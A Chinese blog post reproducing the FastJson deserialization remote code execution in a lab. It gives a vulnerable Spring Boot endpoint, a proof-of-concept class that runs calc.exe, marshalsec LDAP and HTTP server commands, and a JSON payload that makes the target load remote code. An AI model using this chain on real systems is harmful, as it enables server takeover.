记一次FastJson漏洞的复现

前言

Fastjson最经典的反序列漏洞是在1.2.24版本时，当时可以利用的主流方式有两种。

1.JNDI注入利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中的_bytecodes属性进行整个恶意类的反序列化。

2.利用rmi或者ldap让服务器远程调用恶意类进行利用。

第一种方式fastjosn默认不会反序列私有属性，需要在反序列化时设置Feature.SupportNonPublicField这种方式才可以利用成功。

由于第一种方式受限制较多，很多情况下不会设置Feature.SupportNonPublicField，所以我们直接模拟下第二种方式。

准备事项

Python 2.7

Java jdk 1.8.0_101

marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务

springboot简单的代码准备

模拟服务端的准备(被攻击方)

一个超级简单的springboo服务,使用官方生成一个demo即可 https://start.spring.io/

生成模拟服务端

加入fastjson的jar包,版本可以换,我特地用了一个比较低的版本

<dependency>

<groupId>com.alibaba</groupId>

<artifactId>fastjson</artifactId>

<version>1.2.20</version>

</dependency>

加入一个简单的Controller

@RequestMapping("/hello")

public String say(@RequestBody String username) {

System.out.println(username);

Object Nuset=JSON.parseObject(username);

return "hello,this is a springboot demo！~";

}

相当简单代码,接收参数,然后使用FastJson的parseObject去解析.到这里一个简单的模拟服务端完成.直接springboot启动即可.我实在本地启动,我是一台windows的开发机.

攻击准备

这里我用我的腾讯云主机作为rmi或ldap服务的发布方.

首先下载marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务,这是一个java的 maven项目 下载后 直接install 得到 jar包,上传到腾讯云主机服务器.

攻击代码准备

import java.lang.Runtime;

import java.lang.Process;

public class FastjsonPOC {

static {

try {

//因为模拟服务在本地的windows主机启动,所以,执行打开计算器的操作,模拟攻击者要做的事情

Process process = Runtime.getRuntime().exec("calc.exe");

process.waitFor();

} catch (Exception e) {

}

}

}

将此代码本地编译后得到class文件,既FastjsonPOC.class,上传到上传到腾讯云主机服务器.

防火墙放开9090和9091端口

自带的python开始9090的http端口

python -m SimpleHTTPServer 9090

执行以下命令(jdk我就默认你有了哈!)开启rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xxx.xxx:9090/#FastjsonPOC 9091

开干

好了,万事俱备了......

用PostMan或其他http模拟工具,朝模拟服务端的接口发送以下报文:

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

  },

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"ldap://xx.xx.xxx.xxx:9091/FastjsonPOC",

"autoCommit":true

  }

}

可以看到计算器被打开了.............

结语

凶残!!!!!!!!!!!!!,以前写代码时,没注意这些漏洞提示,现在真实的体验到了,就两个字,凶残.......漏洞修复要及时才行啊!